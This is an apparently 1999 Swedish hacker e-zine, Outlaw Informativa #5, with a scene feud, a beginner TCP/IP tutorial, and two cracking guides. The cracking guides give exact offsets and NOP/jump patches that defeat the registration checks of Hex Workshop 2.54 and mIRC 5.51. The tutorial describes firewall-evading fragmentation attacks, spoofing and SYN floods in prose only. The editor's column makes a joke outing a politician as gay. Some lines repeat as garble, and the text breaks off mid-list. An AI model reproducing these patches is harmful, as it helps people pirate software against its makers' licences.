22:14 1999-05-18 Heretics Inc. Presenterar... _______ __ __ Informativa | |.--.--.| |_| |.---.-.--.--.--. | - || | || _| || _ | | |#5| |_______||_____||____|__||___._|________| ×=======================================× | | | ¤ Disclaimer | | ¤ Editor | | ¤ Mederkande | | ¤ Är 07nio75 riktiga phreakers? | | | | ¤ Cracka Hex Workshop 2.54 | | ¤ Cracka mIRC 5.51, mIRC Co. Ltd | | ¤ TCP/IP Tutorial för newbies | | ¤ Läs lokala filer i NT | | ¤ Wingates | | ¤ Säkerhets hål i Netbios | | ¤ nato.int, whitehouse.gov hacked | | | | ¤ Enkelt om Terminaler | | ¤ GSM kan läsa av Elmätare | | ¤ Cellulär styrning, update | | ¤ Lite rippat om AXE från Fidonet | | ¤ Teleutrustning som klarar år2000 | | | | ¤ Copyright | | ¤ Prenumeration | | ¤ eX1t() | | | ×=======================================× w w w . h e r e t i c s . c j b . n e t -Vilka är det som står misstänkta? Är det unga hackers? Jo, det är unga, men jag skulle inte vilja kalla dem för hackers eftersom det ordet ofta förknippas med någon som är duktig på datorer - +-------------------------------------------------------------+ ¤ Disclaimer | +-------------------------------------------------------------+ Vi tar inget ansvar för vad du andvänder informationen till. Information är endast till för att läsas och i utbildnings syfte. Myndighetspersonen är förbjudna enligt lag att läsa denna information +-------------------------------------------------------------+ | Editor [Knash] | +-------------------------------------------------------------+ Var hälsad till issue #5 av Outlaw Informativa ! Visste du att Carl Bilt är homosexuell? NÄHHEJ, jag bara skoja. Det va en snubbe som klagade lite på mig och sa att jag hade skickat Melissa viruset till honom (!?!?!?!?!) hehe, vilket jag inte har gjort. Men däremot skickade jag källkoden i O-I #4, men det är en helt annan femma. Zaqe hittade en tele-box med något slags kretskort i, grymmt..ahh ?? Jaja, i detta nummer blir det lite blandat, tja..lite networking, telefoni, nt och lite cracking. De vanligaste så klart. Hoppas tty får något att titta på den här gången. +-------------------------------------------------------------+ | Medverkande | +-------------------------------------------------------------+ Knash [knash@linux.nu:keytrace@usa.net] Gazzaud [Gazzaud@operamail.com] Overmarzz [mixtile112@hotmail.com] Axxezz [secure contact] +-------------------------------------------------------------+ | Är 07nio75 riktiga phreakers? [Overmarzz]| +-------------------------------------------------------------+ Jag surfade in på deras sida och kunde snabbt konstatera att den verkligen inte var bra.. 1: På Main så står där "...Sveriges aktivaste Phreking grupp.." Hahaha..Aktiva?...nja..dom springer runt med sina Beige och "Phreakar" jappasar...japp...då är man verkligen Phreaker. Dom har inga egna txt filer och på ezine står där ex bilder längst upp(?). Om ezinet? Samma löjliga text om aktivaste grupp och dom börjar väldigt elit genom att skriva 1ntr0 .. sen på disclaimer.. "Informationen i vårat zine är ändast till för att läsas, och om du gör något olagligt shit efter at" LOL...shit..rollie kan engelska.. Beige boxing skola..? Har inte alla svenska phreakers redan skrivit det? hmm all'4'free? iofs så heter det everything... Men att sno mm är inte speciellt skönt..Boxing lista.. Blast: Bra om du vill spr- änga nåns trummhinna...HAHA..ska en telefon lur lira 145-155 db?? HAHA --- Heretics? "Heretics Medlemmar" förstör för 07nio75 medlemmar. Dom påstog att en heretics medlemm vid namnet "Phencier" hadde sparkat och slitit sönder Oizo's Japan. Phencier är inte på något sätt aktiv eller medlem i hertics och jag tycker det är väldigt krä- ngande av R Tyler att gå lös på tangenbordet innan nån fakta ligger på bordet. Det oproffitionela uppförandet kan tolkas på många sätt och jag har krävt en artikel som reder upp detta i nästa zine. Den listan har jag sett nånstans och den är 100% rippad och översatt --- Carding..? Inte bli "bustad" ..hahaha... Oj vad svårt för dom att spåra det..men rollie lurar dem med sina enastående kunskaper och till sist har han skrivit "..Phreaking är inte bara kul, utan även en överlevnads stil." Jag själv tycker inte riktigt om att "kriga" men han började helt utan fakta...Jag har aldrig sagt att jag är en elit Phreaker/hacker så kom inte oh klaga! Jag känner 2 medlemmar i 07975..[S]tasS är skit juste men en REN irc:are ^MaZz^.. Har aldrig Phreakat..Vet inte vad lmhs eller beige är. Dom har väldigt höga förväntningar ...HAHAHAHA +-------------------------------------------------------------+ | Cracka Hex Workshop 2.54 Breakpoint Software [Gazzaud] | +-------------------------------------------------------------+ [Skydd] Cindirella/Seriell Nivå: Medel Ingrepp: NOP/INVERT -==- Förord -==- För alla er som behöver en bra Win32 hexeditor, här är en av mina favoriter. Den är någorlunda liten, 3 897 706 byte installerad och väldigt kraftfull. Jag har tidigare använt version 2.00 men efter det att Axxezz påpekat fördelen med den nya versionen så laddade jag hem den från www.bpsoft. com. version 2.00 men efter det att Axxezz påpekat fördelen med En hel del buggfixar, men jag måste erkänna att jag är lite besviken på deras protection-scheme. Precis som med The Customiser sparade jag mina anteckningar för att ge nybörjarna lite steg-för-steg. --// Grabbing the Tools of the Trade \\-- // Str Ref \\ Först kollade jag runt lite efter användbara strängreferenser. Str Ref -> "Demonstration Version" 00429B6E 00429B51 movsx eax, word ptr [0048CFF8] 00429B58 test eax,eax 00429B5A jne 00429B88 Egentligen ingenting användbart eftersom vi inte har någon funktion utan bara en kontroll av en variabel. Men kanske kan vi ha lite tur, så vi söker efter [0048CFF8] och hittar den vid: 00429610, 004299AF, 00429B51. Tyvärr bara kontroller, ingen funktion som lägger något värde i variabeln. Så mycket för strängreferenser. Så vi tar och börjar nysta i en annan ände. -%%- Dialoger -%%- Som ni ser i data sektionen av HexWorkshop finns det många dialoger i programmet. En för första gången vi kör programmet, en för när vi börjar få lite tid kvar, en när tiden gått ut men vi fortfarande har lite "grace time" kvar och en när det är totalkört. En rolig sak är att de också har en dialogruta som dyker upp om versionen blivit för gammal. DialogID_0073, referenced at: 00425C55 is referenced by: 004297F0 00461D20 (Drawing the dialog etc) Observera den här funktionen : 00429776 call 0042E800 (Återkommer till den alldeles strax) DialogID_00C1, referenced at: 004273D5, called by 00429792 Look at 00429776 -> if je, then call 0042EA35 and if ne there, call 00425C30 which shows DialogID_0073. Ser ni det märkliga? Känner ni lukten av rädd kod? Känner ni stanken av deras protection? Jag tror *sniff* bestämt *sniff* att den *sniff* kommer från... *sniff* Registret! Sparka igång Regedit (C:\Windoze\Regedit.exe) så tar vi oss en titt. [HKEY_LOCAL_MACHINE\SOFTWARE\BreakPoint\Hex Workshop\] CurrentVersion = "2.50" <- varför inte 2.54? Path = "Drive:\PAth\HWORKS32.EXE" Ouw... [HKEY_LOCAL_MACHINE\SOFTWARE\BreakPoint\Hex Workshop\2.50] Major = 0xF8F3F830 Minor = 0x00000000 Om ni vill gå in på alla pinsamma detaljer angående detta så tittar ni i funktionerna 0042EA35, 0042E800 & alla de andra som anropas för att avgöra vilken dialogruta som ska visas. Jag ska dra en snabbgenomgång för alla som är nyfikna men inte orkar kolla. Trots BreakPoints försök att visa på motsatsen så har Major och Minor ingenting med versionen avprogrammet att göra (NÄHÄ! ;-). Major lagrar ett datum, i mitt fall 7nde December 1999 (Bäst före-datum tydligen), och Minor är en statusvariabe- l. Testa att ändra Minor till 0xBB000000 och starta HexWorksho- p. Kul dialogruta, eller hur? Ni kan nu ändra tillbaks om ni vill, men jag lämnade registret sådär för att veta när vi lyckats 'registrera' programmet. --/-/ Nu över till allvaret \-\-- Alla dessa kontroller mot Registret ligger inom funktion 004295A6, som anropas från 0042999A. Denna anrops-snutt av kod anropas bara beroende på ett (C) hopp vid 00429980. 00429978 call 00429403 0042997D cmp eax,1 00429980 jne 0042998D (kontrollerna) 00429986 xor eax,eax 00429988 jmp 00429E9E Hmmmmm... Intressant? Faktiskt inte ett dugg. Men ibland kan det vara kul och göra er lite nervösa :-). Funktion 00429403 kontrollerar bara om det finns en HW.INI, säkert pga bakåt-kom- pabilitet till 16-bit. --{ Trace Main }-- Så eftersom vi nu har hamnat i programmets Main-sektion (eller WinMain om vi ska vara riktigt petiga (inte för att det behöver vara WinMain i ett Assemblerprogram)). Så ska vi väl ta och avsluta den här lilla, men ack så lärorika, utflykten, eller vad säger ni? Vi kollar igenom alla funktioner som anropas innan den som vi just kom ifrån (där är det ju redan bestämt om vi är Registrerade eller inte) och hittar 00437540. Tjohopp. Kunde vi tagit en enklare väg? Jajamensan: Str Ref -> "HEXWORKS.REG", men då hade ni ju missat halva deras protection. Det hade ju varit illa. Så ta ett djupt andetag, titta igenom funktionen, följ koden, känn hur den rör sig, vart den går och ta sedan fram skalpellen och knäck HexWorkshop 2.54. |------------------------------------| [Slutsats] 004375AC - NOPNOPNOPNOPNOPNOP 004375D5 - NOPNOP 004375FB - E91901000000 Fyll HEXWORKS.REG med 220-250 byte. -----///: Efterord :\\\----- Så nu har vi 'Registrerat' ett i framtiden viktigaste av våra verktyg. Ska bara ta en liten funderare kring deras protection- scheme. Först och främst tycker jag deras Registry-taktik är i lite vekaste laget. Vem är den avsedd att lura? Vanliga användare? Tror inte dom är inne i Registret och röjer allt för ofta. Crackers? När en nybörjare som jag lyckas lista ut deras protection? Ooo, känner trygga BreakPoint. Dessutom förstår jag inte poängen med att läsa från Registret så många gånger, en per eventuell dialog. Om de nu försökte lura oss att Minor & Major hörde till versionen, varför inte bara läsa in dessa värden en gång? Ingen sitter och kontrollerar versionen på sitt program, runt fem gånger, *i rad*. Deras .REG fil är inte mycket till skydd heller (som ni märkte), mestadels pga att den finns med från början. Tom givetvis, eftersom dom inte gärna kan lämna ut ett seriell/användarnamn. Men hur många börjar inte fundera om dom ser en *tom* fil med i sin installation? Som dessutom slutar på ändelsen .REG. Så hur är nu .REG uppbyggd? Bra, fråga. Jag vet inte, och jag tänker heller aldrig ta reda på det. Ända syftet med det vore för att göra en KeyGenerator och sådant gör jag inte. Det har inget med någon gloriös etik att göra, utan bygger mer på två faktum: vill dom ha ett fungerande program, knäck det själva och det faktum att seriellnummer finns det redan flera miljoner lite överallt på nätet. Det är ingen som lär sig någonting av det. /// Skriven av: Gazzaud @ #SweHack, #Programming.se, #crack Mailto: Gazzaud@operamail.com \\\ +-------------------------------------------------------------+ | Cracka mIRC 5.51, mIRC Co. Ltd [Gazzaud] | +-------------------------------------------------------------+ *************************************************** * * * mIRC 5.51 * * * * mIRC Co. Ltd * * * *************************************************** [Skydd] Cindirella/Seriell Nivå: Enkel Ingrepp: NOP -==- Förord -==- För att skapa ett bättre intresse kring cracking (inte malicio- us hacking utan +ORC's cracking) så ska jag försöka leverera lite cracks av och om lite mer 'mainstream' program. Annars har det ju mestadels varit verktyg användbara för cracking. Alla vet vad mIRC är, och just nu är 5.51 senaste versionen. Deras protection är så enkelt att det är nästan enklare att cracka deras program än att hitta ett seriellnummer eller ett 'ready-made' crack. Ni ska få se. String Ref "Your registration has been entered successfully." @ 00436E04 String Ref "Sorry, your registration name and number don't match!" @ 00436E68 Ref by: (C) 00436D81 00436D7A call 00493CFC 00436D7F test eax,eax 00436D81 je 00436E22 00493CFC is Ref by: 00436D7A, 00493E93 Hmmmm? Näe... [HEX] 00493E9A NOPNOP 00436D81 NOPNOPNOPNOPNOPNOP --// Avslutning \\-- Jupp. Mer än så var det inte. Jag gjorde den lite avsiktligt kort, eftersom ingen verkar bry sig om några utförligare beskrivningar ändå. Kommentarer skickas till det vanliga stället... // Gazzaud +-------------------------------------------------------------+ | TCP/IP Tutorial för newbies [Knash] | +-------------------------------------------------------------+ TCP/IP är ett Nätverks protokoll som från början var utvecklat av ARPAnet. Protokollet som tar hand om en stor del av nätv- erks trafiken. Jag såg faktiskt en film om Internet's historia, titeln på filmen var ju lite högt lam faktiskt (Historian om @) men innehållet va mycket intressant, dom visade den första ser- vern osv. som såg ut som ett kylskåp. TCP/IP står för Transmis- sion Control Protocol/Internet Protocol. TCP/IP är även en del av kerneln i Unix, även är TCP/IP ett OSI baserat protokoll (läs om OSI senare i artikeln) För er som inte vet så står OSI för: Open System Interconnection. Till Alla Newbies: Internet är ett nätverk, faktiskt ett WAN (Wide Area Nework) alltså flera LAN (Local Area Network) som är ihopkopplade. Från början va det bara ett LAN som va baserat på TCP/IP, men det va länge sen då ARPAnet pysslade. ¤ Open System Interconnection [OSI] ¤ TCP/IP Modellen ¤ TCP Header ¤ TCP Flags ¤ IP Header ¤ UDP Header ¤ Sammanfattning av huvudsyftena i tcp/ip ¤ Vanliga TCP/IP attacker ¤ UDP och TCP, skillnader och nackdelar ¤ Portar som andvänder TCP/IP, UDP ¤ Gå vidare ¤ Efterord ¤ Tack Till ¤ Källor -==- Open System Interconnection [OSI] -==- OSI modellen är baserat på 7 olika lager. 7. Application Layer 6. Presentation Layer 5. Session Layer 4. Transport Layer 3. Network Layer 2. Data Link Layer 1. Physical Layer Jag tog dom på engelska, det ser bättre ut då. Mellan dom olika lagrerna skickas paket, varje lager tar hand om sin uppgift. , övre lager och nedre lager. När ett paket skickas från din dator passerar den alla 7 lager, från 7 ner till 1. När du tar emot ett paket passerar den även då fast den motsatta vägen, från 1 upp till 7. Listan ovan är de standardiserade lagrerna, det kan finnas andra namn för dem på andra platformer. Man skulle kunna dela upp dom olika OSI Lagrerna i 2 sektioner. Den övre delen av OSI Modellen tar hand applikationer, och är ofta redan inprogrammerat i Mjukvaran. Den lägre delen tar hand om transporten av data, IP paket osv. Physical Layer och Data Link Layer är inprogrammerat i hårdvar- an och mjukvaran. -{ Övre Lagren }- Application Layer Presentation Layer Session Layer -{ Lägre Lagren }- Transport Layer Network Layer Data Link Layer Physical Layer Application Layer ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ Applikations Lagret somboliserar den aktiva applikationen som arbetar i Exempel: Netskape, Cute FTP, Word, Excel. Texten ell- er bilden eller vad du nu arbetade med skickas vidare till nät- sta lager. Presentation Layer ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ Detta layer söker i dina bilder, ascii filer efter formaterad text (typ, font size, font color, typsnitt) Presentation Layer försöker även komprimera informationen så att paketet inte ska bli stort och som ska resultera en snabb tcp/ip connection. T.ex. en textfil skulle kunna komprimeras 80%, men med en bild blir det mycket svårare pågrund av binärt innehåll osv. Session Layer ¯¯¯¯¯¯¯¯¯¯¯¯¯ Detta layer tar hand om trafiken och skickar paketen neråt till de lägre lagret. Transport Layer ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ Detta lager lägger till läsningar från CRC (Cyclic Redundancy Checking) till eller från paketet. CRC kontrollerar så att inte paketet har blivit forkortat på något sätt. Network Layer ¯¯¯¯¯¯¯¯¯¯¯¯¯ Konverterar och addresserar. "Logical Adresses" till "Physical adresses" eller så som "nodenumbers" och IP Addresser. Detta layer ligger väldigt nära hårdvaran. Alltså tar även nätverks hårdvaran hand om detta, men inte endast! Data Link Layer ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ Detta layer är updelat i två parter: LLC (Logical Link Control) och MAC (Medium Access Control) LLC kontrollerar vilket protok- ll som andvänds och arbetar tillsammans med Layer 3 (Network L- ayer) MAC tar hand om vilka driv rutiner som används för de olika Kommunikations Tillbehören. MAC kontrollerar även frametype (t.ex. 120.4, 120.3, 120.6) Physical Layer ¯¯¯¯¯¯¯¯¯¯¯¯¯¯ Den hårdvaran som behövs för att kunna kommunicera (t.ex. fibe- roptik kabel, nollmodem kabel, modem och nätverks kort) Detta funkar ganska enkelt, paketen konverteras till ljus eller elektriska impulser beroenda op vilken slags överförings media man andvänder. -==- TCP/IP Modellen -==- TCP/IP modellen består av 4 olika lager. Även här kan man förd- ela lagrerna i 2 olika sektioner vilket är ganska enkelt att gissa. Application Layer Transport Layer Internet Layer Network / Physical Layer Network / Physical Layer (Nätverk / Fysiskt lager) ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ TCP/IP har en grymmt minimal uppgift att ta hand om Nätverks o- ch de fysiska lagret. Eftersom det mesta lämnas åt hårdvaran... så som Nätverks kort och Modem. Internet Layer ¯¯¯¯¯¯¯¯¯¯¯¯¯¯ Är ett av de viktigista lagrerna eftersom den tar hand om addr- essering av IP paket. Den tar också hand om växling av paketen (Packet Routing) Transport Layer ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ Juppz, detta är också ett mycket viktigt lager (checka bara på namnet, så fattar du) Transporterings lagret tar emot data fr- ån Applikations Lagret (Application Layer) som sedan Transport Lagret förbereder för att sedan bli utskickat i Nätverket. Det finns 2 olika typer av transport lager protokoll, UDP och TCP, UDP står för User Datagram Protocol. Application Layer ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ Är ofta inprogrammerat i kommunikations program, t.ex. web bro- wsers, FTP klienter, Telnet Klienter osv. Applikations Protoko- llet definerar gränssnitt genom olika applikationer (program). -==- TCP Header -==- Alla TCP/IP "Headers" och "Layers" kommunicerar med varandra och det är i princip det som är grejen med TCP/IP networking. Jag tänker inte förklara allt i detalj när det gäller TCP Head- ern och det finns 2 anledningar till det: Jag kan inte så myck- et om TCP Headern över huvudtaget och att detta ska bara vara ganska grunläggande. TCP Header ¤ ¤ ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ ¤ SRC PORT ¤ DST PORT ¤ ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ ¤ SEQUENCE NUMBER ¤ ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ ¤ ACK NUMBER ¤ ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ ¤ DATA ¤ Reserved ¤ U|RST|S ¤ Windows ¤ ¤ OFFSET ¤ Field ¤ F|A|P ¤ Field ¤ ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ ¤ CHECKSUM ¤ URGENT PTR ¤ ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ ¤ ¤ SRC Port (Source Port) ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ Där datorn sänder ut paketet skriver porten paket skickas ifrån och skickar iväg det. Size: 16 bit DST Port (Destination Port) ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ Är dit paketet ska, SRC port skickar paketet och DST port tar emot den. Size: 16 bit Sequence Number ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ Identifierar paketets plats följd av sekvens TCP överföringen. Size: 32 bit ACK Number ¯¯¯¯¯¯¯¯¯¯ ACK Står för acknowledgement som sen sammanbinder acknowledge- ment number. ACK paketet tar SEQ numret från det paket den ska verifiera och helt enkelt ökar med 1 (satt på on) När en conn- ection är etablerad är alltid är ACK allid skickat. Size: 32 bit DO ¯¯ DO är en synonym och står för Data Offsets (All teknik som är uppdelat i ett flertal delar andvänder alltid synonymer, t.ex. telefonväxlar, internet protokoll) DO är ett nummer som indik- erar var datan börjar. Size: 4 bit Reserved Field ¯¯¯¯¯¯¯¯¯¯¯¯¯¯ Är ett reserverat fält för obestämda tillfällen då data ska överföras osv. Reserved Field är alltid är satt på (0) Size: 4 bit RST ¯¯¯ Reset Flag återställer en connection. S ¯ Syn Flag, det finns något som kallas för TCP SYN Flooding där buggar i TCP systemet utnyttjas. SYN står för synchronize sequ- encenumber. Låt oss säga att en klient förösker etablera en connection med en server. Klienten och Servern växlar ett sätt med olika mede- landen för att bilda en inre data struktur för att kunna klara kontakten med servern (Har jag fel?) Denna lilla sak kallas för 3-Way Handshake. ______________________________________________ TCP Connection Establishment (3-way handshake) ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ 3-way handshake börjar när klienten startar en "Connection Req- uest" genom att överföra ett SYN Medelande till servern. När servern tar emot SYN Medelandet så skapar servern en "entry" i serverns oavgjorda TCP connection DATA struktur och skickar ett SYN-ACK medelande som svar till klienten. Klienten avslutar "3-way handshake" genom att svara med ett ACK medelande till servern. Var kommer TCP SYN Flooding in i bilden ? .. jo för att attacken (Flood) måste kunna skicka över data till datorn måste den ju också etablera en connection- Mer om "3-way handshake" kommer i senare artiklar, möjligtvis i O-I #6. F ¯ Fin Flag andvänds för att stänga connections (=anslutningar) Varje avslutning av en connection skickar ett paket med Fin Fl- ag, som måste bli bekräftad (godkänd kan man också säga) också kan jag berätta att fyra paket andvänds för att stänga en connection. A ¯ Ack Flag P ¯ Push Flag WINDOW ¯¯¯¯¯¯ Numret som "data octets" börjar med den som indikerar i acknowl- edgment field som sändaren självklart vill acceptera. Size: 16 bit CHECKSUM ¯¯¯¯¯¯¯¯ Detta är ett valfritt fält som säkerhets kollar så att datan i ett paket inte är skadad. Checksum kontrollerar alltså i stor del att det inte är skett några fel i tcp överföringen. -==- TCP Flags -==- TCP flaggorna är antingen satta 1(on) och 0(off) SYN Flag ¯¯¯¯¯¯¯¯ SYN = synchronize Denna flagga är satt på on när ett fjärr-system vill starta en tcp anslutning. ACK Flag ¯¯¯¯¯¯¯¯ ACK = acknowledge När denna flagga är på on aktiveras "Acknowledgement field" i TCP Headern. FIN Flag ¯¯¯¯¯¯¯¯ När denna flagga är satt på on, talar den om för fjärr-systemet att avsluta tcp anslutningen. RST ¯¯¯ När denna flagga är satt på on talar den om för fjärr-systemet att tcp anslutningen måste bli återställd (reset) URG Flag ¯¯¯¯¯¯¯¯ URG = Urgent Pointer Field När denna flagga är satt på on talar den om för "application l- ayer Program" att paketet är angeläget. PSH Flag ¯¯¯¯¯¯¯¯ PSH = Push Function När denna flagga är satt på on, blir fjärr-systemet att ett stort antal paket som är på väg. -==- IP Header -==- Alla paket från TCP och UDP blir skickade till Operatorn för växling. IP lägger till en header innan paketen levereraras vi- dare. IP Headern är mycket enklare en TCP men väldigt viktigt. IP Header ¤ ¤ ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ ¤ VER ¤ LENGHT ¤ SERV TYPE ¤ PACKET LENGHT ¤ ¤ IDENT ¤ DF ¤ MF ¤ FRAG OFFSET ¤ ¤ TTL ¤ TRANSPORT ¤ HEADER CHECKSUM ¤ ¤ SENDING ADDRESS ¤ ¤ DESTINATION ADDRESS ¤ ¤ OPTIONS ¤ PADDING ¤ ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ ¤ ¤ !!! Alla defentioner tas inte med !!! VER ¯¯¯ Ett enkelt litet fält som håller reda på vilken version av protokollet som andvänds. LENGHT ¯¯¯¯¯¯ Detta är längden på IP Headern. PACKET LENGHT ¯¯¯¯¯¯¯¯¯¯¯¯¯ Detta är längden på hela paketet. IDENT ¯¯¯¯¯ Ett enkelt litet fält som håller reda på vilken version av Detta är en unik identifierad som andvänds för att re-assamble- ra fragmenterade msg:s. DF ¯¯ När denna flagga är satt på on går inte msg:et att fragmentera. MF ¯¯ Denna talar om för fjärr-datorn att mer fragmentering av medel- andet är på väg. Fragmenteringen blir "re-assembled" av Intern- t Layer. FRAG OFFSET ¯¯¯¯¯¯¯¯¯¯¯ Håller positionen av de specifika paketen i serien av fragment- erade paket. TTL ¯¯¯ TTL = Time To Live Utan detta fält skulle alla data paket flyta omkring för allti- d. När TTL är uppe så kasserar den alltid när ett data paket flyter till punken 0(off) så "dör" dom. TRANSPORT ¯¯¯¯¯¯¯¯¯ Detta fält innehåller numret från "Transport Layer Protocol" som behandlas i käll systemet. SENDING ADDRESS ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ Är adressen från sendnings systemet, alltså var ifrån paketen kommer ifrån. DESTINATION ADDRESS ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ Är addressen dit paketet ska. -==- UDP Header -==- UDP Headern är mycket enklare än vad TCP Headern är eftersom UDP headern inte sammanhåller lika mycket information som TCP. ¤ ¤ ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ ¤ SRC PORT ¤ DST PORT ¤ ¤ LENGHT ¤ CHECKSUM ¤ ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ ¤ ¤ Alla fälten i UDP headern är exakt samma som i TCP headern, för att få en beskrivning är det bara att gå till titeln TCP Header. -==- Sammanfattning av huvudsyftena i tcp/ip -==- TCP : Tar han om överföringen och ser till så att allt skick- as iväg sen tar IP hand om var den ska skickas. IP : Tar hand om adresseringen och routing av paket mellan olika värdar och nätverk ICMP: Är dock ett enskilt protokoll, men kommunicerar med tcp/ip genom att rapportera fel osv. ARP : Lite mera komplicerat, även detta kanske dyker upp i senare artiklar. Skaffar fram hårdvaruadresser (MAC) från olika som ligger i samma Nätverk. -==- Vanliga TCP/IP, UDP attacker -==- IP Hijacking ¯¯¯¯¯¯¯¯¯¯¯¯ Andvänds för att styra om TCP paket strömmen så du kan bli godkänd och komma förbi skydd såsom t.ex. Firewalls, one- time password och ticketing authentication. Packet Fragmentation Attacks ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ Jag har förklarat lite enkelt ovan om Packet Fragmentation, men doch inte i helhet. Packet Fragmentation är en del av IP som d- elar in datagram i flera olika delar vid överföringen som sedan blir tillbaka delat till ett datagram när den nåt DST Port (De- stionation Port) Exempel: SRC Port DST Port .--------. _ .--------. | | |P|_ | | |Datagram| ===> ¯|P| _ ===> |Datagram| | | ¯ |P| | | '--------' ¯ '--------' P = Paket (eng. packet) ..tänke att ni inte e så bra på engels- ka som jag inte är =-o) Attacken: En Packet Fragmentation Attack kan andvändas för att komma förbi en en befintlig Firewall, men detta beror inte på hur Paket Fragmenteringen är uppbyggt, fast en liten del hur paket- en blir "reassembled" Ett datagram ska bli uppdelade i flera paket som lämnar huvud portionen av paketet oförändard. Ok, men skit samma. Nu ska jag berätta teoretiskt hur det funkar :-O Elajt Cr1Xx0rH4Xx0r skapar ett litet paket som fodrar sig att vara den första biten i ett "multi-packet datagram" Den är är skriven på ett sätt som visar sig att den ska genom port 80 och ska till "http service" och port 80 är öppen överallt som standard. Universitet, Arbeten har stor nytta av http idag, så därför tillåter Brandväggen elr. Paket Filtret att paketet åker förbi. Elajt Cr1Xx0rH4Xx0r ändrar värdet som hänvisar paketet genom port 80 till port 23 som andvänds av telnet, men hoppsan nu fick han ju telnet access också... Voila ! ..firewalls och filter kan dra åt helvete ! PS. om du vill veta mera om Packet Fragmentation Attacks så hänvisar jag dig till "TCP packet fragment attacks against firewalls and filters" som är mycket informativ. Visserligen så beskriver den inget praktiskt. Men de teoretiska går all- tid före de praktiska DS. IP Spoofing ¯¯¯¯¯¯¯¯¯¯¯ IP Spoofing eller IP Faking är en attack som ändrar dit IP till ett annat. Detta kan andvändas för att gömma identitet eller skydda dig mot DoS attacks (DoS=Denial Of Service) Denial Of Service är attacker mot TCP/Ip såsom Flooding, Nuking osv som kan få en tcp connection att hänga sig eller bli upptaget så att tcp anslutningen inte kan andvändas. ok. jag tog ju inte upp alla de vanligaste. Men hmm...jag har ju inte studerst dem alla. Jag hade något underlig känsla i kroppen att artikeln va brodskande. -==- UDP och TCP, skillnader och nackdelar -==- TCP andvänder en fast anslutning (som en kanal) där all data går igenom medans UDP inte har fasta anslutningar, utan allti- ng skickas iväg i form av Paket. UDP skulle kunna gämnföras med radio och TCP med telefon. Signalerna från radion kan fångas upp och manipuleras medans telefonens elektriska impulser skic- las via en bestämt kabel. Du vet gamla ICQ använde ju sig av UDP, det var därför dessa ICQ Spoofers funkade. En ICQ Spoofer kunde alltså andra skicka messages från andra andvändare. Kunde andvändas för att bryta vänskap osv. [h0h0] Exempel på UDP connection ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ ______ ______ | | --> --> | DST | | UDP | ---> ---> | HOST | (Från Basics of TCP/IP) | | --> --> | | ¯¯¯¯¯¯ ¯¯¯¯¯¯ Som du ser andvänder inte UDP en fast anslutning till DST Host (Destination Host) Medans TCP andvänder en fast anslutning (se. exempel på TCP connection nedan) Exempel på "3-way-handshake" ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ ______ ________ | | ===========> 500 | REMOTE | | TCP | | HOST | (Från Basics of TCP/IP) | | <======= ACK 501 | | ¯¯¯¯¯¯ ¯¯¯¯¯¯¯¯ TCP andvänder "3-way-Hanshake" för att starta en fast data överföring. Jag tog upp tidigare lite enkelt om SYN och ACK Flags och i Exemplet nedan på en "3-way-Handshake" och det är där dom kommer in :) Exempel på "3-way-handshake" ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ ______ ________ 1:a | | ===========> SYN SEQ 10 | REMOTE | 2:a | TCP | SYN SEQ 400 ACK 11 <=== | HOST | (Från Basics of 3:e | | ==============> ACK 401 | | TCP/IP) ^ ¯¯¯¯¯¯ ¯¯¯¯¯¯¯¯ | Steg i överföringen. -==- Portar som andvänder TCP/IP, UDP -==- Jag kan berätta att alla dessa services andvänder sig av TCP/IP för Paket överföring och Växling. Här kommer en lista på tjänster som andvänder tcp/ip och udp. Jag har faktiskt rippat den från //Windows/services [lamt 